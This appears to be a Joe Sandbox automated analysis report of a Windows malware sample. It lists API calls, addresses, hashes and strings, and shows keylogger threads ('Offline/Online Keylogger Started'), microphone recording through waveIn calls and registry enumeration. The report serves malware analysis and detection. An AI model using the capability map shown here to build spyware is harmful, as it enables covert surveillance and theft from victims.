GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890

Strings

CorExitProcess, xrefs: 00440865
mscoree.dll, xrefs: 00440853

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98

Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,00000000,00000000,00000000), ref: 00405100
SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,00000000,00000000,00000000), ref: 0040510C
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,00000000,00000000,00000000), ref: 00405117
CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,00000000,00000000,00000000), ref: 00405120

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

Strings

Connection KeepAlive | Disabled, xrefs: 004050D9

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: Connection KeepAlive | Disabled
API String ID: 2993684571-3818284553
Opcode ID: 85289c313b9b8f3daf800e35edf6731a0ae2994a3e42f41d2c952085963ed016
Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
Opcode Fuzzy Hash: 85289c313b9b8f3daf800e35edf6731a0ae2994a3e42f41d2c952085963ed016
Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A

Function 00418D76 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
Sleep.KERNEL32(00002710), ref: 00418DBD
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6

Strings

Alarm triggered, xrefs: 00418D7F

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: ec9665da0830ca0d42ab207d8f86327420e3023eb33c264484c3245109a19886
Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
Opcode Fuzzy Hash: ec9665da0830ca0d42ab207d8f86327420e3023eb33c264484c3245109a19886
Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF

Function 0043BB4A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9

Function 0044220D Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B

_free.LIBCMT ref: 00442318
_free.LIBCMT ref: 0044232F
_free.LIBCMT ref: 0044234E
_free.LIBCMT ref: 00442369
_free.LIBCMT ref: 00442380

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48

Function 004412F9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044136B
_free.LIBCMT ref: 0044138B

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84

Function 0044E30C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
__alloca_probe_16.LIBCMT ref: 0044E391
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
__freea.LIBCMT ref: 0044E3FD

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 948daca83ef3f9aa8265cebafcc6032cf42c47e18cc2a336b1be51d4bcc73cbf
Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
Opcode Fuzzy Hash: 948daca83ef3f9aa8265cebafcc6032cf42c47e18cc2a336b1be51d4bcc73cbf
Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98

Function 00401BC9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
waveInStart.WINMM ref: 00401CDE

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID:
API String ID: 1356121797-0
Opcode ID: 3447fdb9ff269e9e53364b21b500d15ff6263fd99ebe497e903e33a248139b70
Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
Opcode Fuzzy Hash: 3447fdb9ff269e9e53364b21b500d15ff6263fd99ebe497e903e33a248139b70
Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E

Function 0044C53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044C543
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
_free.LIBCMT ref: 0044C59F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8

Function 0040FBC8 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
int.LIBCPMT ref: 0040FBE8

Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14

std::_Facet_Register.LIBCPMT ref: 0040FC28
std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
__CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID:
API String ID: 2536120697-0
Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8

Function 004457A9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
_free.LIBCMT ref: 004457E3
_free.LIBCMT ref: 0044580A
SetLastError.KERNEL32(00000000), ref: 00445817
SetLastError.KERNEL32(00000000), ref: 00445820

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D

Function 0044DB9C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044DBB4

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044DBC6
_free.LIBCMT ref: 0044DBD8
_free.LIBCMT ref: 0044DBEA
_free.LIBCMT ref: 0044DBFC

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C

Function 00412446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C

Strings

[regsplt], xrefs: 00412608

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]
API String ID: 3554306468-4262303796
Opcode ID: c7527defe273b290db240a15dfeac0d87092dab51f9164a669b9141c63326ccc
Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
Opcode Fuzzy Hash: c7527defe273b290db240a15dfeac0d87092dab51f9164a669b9141c63326ccc
Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8

Function 00409203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Strings

Offline Keylogger Started, xrefs: 00409228, 0040922F, 0040925C

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: f56d5a069b9674fe497883c128baf58696cbd842302250d7bf008ed8ad4f4277
Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
Opcode Fuzzy Hash: f56d5a069b9674fe497883c128baf58696cbd842302250d7bf008ed8ad4f4277
Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF

Function 00404FD4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067

Strings

T/F, xrefs: 00405004
Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: Connection KeepAlive | Enabled | Timeout: $T/F
API String ID: 481472006-155447768
Opcode ID: d3af403f1385e2d01355aa12c50cf574904688da40660193f08fbb313c76cbf4
Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
Opcode Fuzzy Hash: d3af403f1385e2d01355aa12c50cf574904688da40660193f08fbb313c76cbf4
Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F

Function 0043A8F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043A924
_free.LIBCMT ref: 0043A94A

Strings

XF, xrefs: 0043A9B1
0]T, xrefs: 0043A91F, 0043A92C, 0043A945, 0043A952, 0043A978

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: _free
String ID: 0]T$XF
API String ID: 269201875-3407208694
Opcode ID: cb74daebedeac94c0edd9e9a4f608c47af35d50e83ab7986da7a67bf282e73af
Instruction ID: 29f128b94e4315e8473d4fe5e2203e9150e620d95e20f300bbe5d6479d49c613
Opcode Fuzzy Hash: cb74daebedeac94c0edd9e9a4f608c47af35d50e83ab7986da7a67bf282e73af
Instruction Fuzzy Hash: FD11B4B1A402005EE7205F2ABC45B5632946F54734F165A37F9A0EB3E0F3B8C8854B8B

Function 00409E37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF

Strings

Online Keylogger Started, xrefs: 00409E4C, 00409E55, 00409E7F

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
